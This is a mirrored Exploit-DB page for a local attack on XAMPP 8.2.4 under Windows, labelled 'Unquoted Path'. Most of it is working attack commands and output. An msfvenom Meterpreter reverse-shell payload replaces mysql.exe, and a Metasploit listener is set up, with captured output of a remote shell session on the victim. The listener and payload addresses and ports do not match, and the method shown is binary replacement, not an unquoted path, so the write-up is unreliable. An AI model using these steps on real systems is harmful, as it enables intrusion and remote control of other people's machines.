bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51585.txt
Exploit-DB fd788a92e3 DB: 2023-07-16 
9 changes to exploits/shellcodes/ghdb

Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Admidio v4.2.10 - Remote Code Execution (RCE)
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Bus Pass Management System 1.0 - 'viewid' SQL Injection
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Bus Pass Management System 1.0 - 'viewid' SQL Injection

Icinga Web 2.10 - Authenticated Remote Code Execution

News Portal v4.0 - SQL Injection (Unauthorized)

Pluck v4.7.18 - Remote Code Execution (RCE)

ProjeQtOr Project Management System v10.4.1 - Multiple XSS

WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

XAMPP 8.2.4 - Unquoted Path
2023-07-16 00:16:39 +00:00

59 lines
No EOL
1.8 KiB
Text
Raw Blame History

# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/
Steps to Exploit:
1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell
C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto
// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
Volume in drive C has no label.
Volume Serial Number is 80B5-B405
Directory of C:\xampp\mysql\bin
[...]
Reference in a new issue View git blame Copy permalink